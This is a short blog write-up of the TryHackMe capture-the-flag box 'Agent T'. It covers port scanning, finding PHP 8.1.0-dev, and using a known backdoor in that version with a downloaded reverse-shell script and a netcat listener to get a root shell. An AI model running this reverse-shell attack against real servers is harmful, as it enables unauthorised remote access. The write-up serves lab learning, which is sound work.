TryHackMe CTF: Agent T

This box was fun. At first, I was looking at the wrong place. After a few moments I realized how dumb I was.

Let’s start off with port scanning. I used rustscan to do this.

open port scan

# -a <IP> : IP of the victim machine

# -r1–65535: port range to scan (1 to 65535)

Only port 80 (http) is open. There was nothing useful in the ‘View-Source’ page. So, the next was to detect the version of the service used in port 80.

nmap service scan

# -sCV : Use default scripts and probe the port for version info

We can see that PHP version 8.1.0-dev is being used. This can also be found using burpsuite:

http response in burp

If we do a quick google search (sth like ‘PHP 8.1.0-dev exploit’) we can find that there is a backdoor in that version. I found a useful reverseshell script here.

We can use this script to gain a reverseshell. But, before that, we have to set up a netcat listener on a new terminal.

# -l: listen

# -v : verbose

# -p 1234: on port 1234 (-p has to be specified just before the port ‘1234’)

After this, we can run the script:

python3 <downloaded_file.py> <http://victim_ip> <your_ip> <port>

<downloaded_file.py> : the one you got from the github

There is a revershell connection in the tab where netcat is listening. There was no need for privilege escalation as I got the revershell as the ‘root’ user.

After traversing through some directories, I found the flag.

Enjoy!

Walkthrough credit goes to https://systemweakness.com/tryhackme-agent-t-d755f442a87b.